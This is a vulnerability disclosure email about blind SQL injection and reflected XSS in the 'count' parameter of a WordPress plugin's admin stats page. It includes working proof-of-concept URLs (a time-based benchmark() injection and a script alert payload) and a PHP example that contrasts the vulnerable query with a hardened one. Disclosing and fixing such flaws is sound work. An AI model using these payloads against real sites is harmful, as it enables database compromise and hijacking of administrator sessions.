Subject: Blind SQL injection and XSS in SEO SearchTerms Tagging 2 1.535
Date: Wed, 8 Jul 2015 14:21:33 +0200

Hello,

Plugin: SEO SearchTerms Tagging 2 1.535 https://wordpress.org/plugins/searchterms-tagging-2/

Exploitation requires an authenticated administrator, but the page has no CSRF protection, so an attacker can trigger the injection by getting a logged-in administrator to open a crafted link. The same parameter is also vulnerable to reflected XSS.

1. SQL injection (pk_stt2_db_get_popular_terms())

Method: GET
Url: http://localhost/wp-admin/options-general.php?page=searchterms-tagging2.php&stats=1&count=[sqli]
Vulnerable parameter: count

Example PHP callstack:
pk_stt2_admin_print_searchterms   [/searchterms-tagging-2/searchterms-tagging2.php:239]
pk_stt2_db_get_popular_terms   [/searchterms-tagging-2/searchterms-tagging2.php:729]
wpdb::get_results


Verification (time-based: the injected PROCEDURE analyse() clause evaluates benchmark(300000000,sha1(1)), so the response is noticeably delayed when the injection succeeds):

http://localhost/wp-admin/options-general.php?page=searchterms-tagging2.php&stats=1&count=1,1%20PROCEDURE%20analyse((select%20extractvalue(rand(),(select%20benchmark(300000000,sha1(1))))),1);

Similar SQL injections in:

pk_stt2_db_get_search_terms
pk_stt2_db_get_recent_terms
pk_stt2_db_get_random_terms
pk_stt2_db_get_home_keywords
pk_stt2_db_get_popular_terms
pk_stt2_db_get_popular_tags
pk_stt2_db_get_last_promoted_post_title
pk_stt2_db_get_posts_wo_traffic



2. XSS

Method: GET
Url: http://localhost/wp-admin/options-general.php?page=searchterms-tagging2.php&stats=1&count=[xss]
Vulnerable parameter: count

Verification:

http://localhost/wp-admin/options-general.php?page=searchterms-tagging2.php&stats=1&count=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E
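Added illustration, not code from the plugin: a hypothetical admin handler and query function that mirror the reported call chain (admin page -> DB helper -> wpdb::get_results), showing the pattern that allows both findings (the raw count parameter reaching a LIMIT clause and being echoed back unescaped) next to a hardened version with a CSRF nonce, integer coercion through $wpdb->prepare(), and escaped output. All function names, the table name and the column names are assumptions.

```php
<?php
// Added example (not the plugin's own code). Function, table and column names
// are assumptions chosen to illustrate the reported pattern.

// Vulnerable pattern: the query string value is interpolated straight into the
// SQL text. A value such as "1,1 PROCEDURE analyse(...)" becomes part of the
// LIMIT clause verbatim and is executed by wpdb::get_results().
function stt2_example_popular_terms_vulnerable( $count ) {
    global $wpdb;
    $table = $wpdb->prefix . 'stt2_terms'; // assumed table name
    $sql   = "SELECT term, hits FROM $table ORDER BY hits DESC LIMIT $count";
    return $wpdb->get_results( $sql );
}

// Hardened: the value is coerced to a non-negative integer and bound through
// $wpdb->prepare() with %d, so only a number can ever reach the LIMIT clause.
function stt2_example_popular_terms_safe( $count ) {
    global $wpdb;
    $table = $wpdb->prefix . 'stt2_terms'; // assumed table name
    $count = absint( $count );
    if ( 0 === $count ) {
        $count = 10; // sensible default instead of an empty or invalid limit
    }
    $sql = $wpdb->prepare(
        "SELECT term, hits FROM {$table} ORDER BY hits DESC LIMIT %d",
        $count
    );
    return $wpdb->get_results( $sql );
}

// Hardened admin page handler for the stats view: capability check, CSRF nonce
// check, integer-only parameter handling and HTML-escaped output, so that
// count=<script>...</script> is rendered as text rather than executed.
function stt2_example_admin_print_stats() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // Links to this view must be built with wp_nonce_url( $url, 'stt2_stats' );
    // a crafted link from a third-party site will fail this check.
    check_admin_referer( 'stt2_stats' );

    $count = isset( $_GET['count'] ) ? absint( wp_unslash( $_GET['count'] ) ) : 10;
    $rows  = stt2_example_popular_terms_safe( $count );

    echo '<p>Showing top ' . esc_html( $count ) . ' search terms</p>';
    echo '<ul>';
    foreach ( $rows as $row ) {
        echo '<li>' . esc_html( $row->term ) . ' (' . (int) $row->hits . ')</li>';
    }
    echo '</ul>';
}
```

The same two changes (absint() plus a %d placeholder in $wpdb->prepare(), and esc_html() on anything reflected) apply to every helper listed under "Similar SQL injections", since they share the unescaped-parameter pattern; the nonce check belongs in the page handler that dispatches to them.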


--
Regards,
Marcin Probola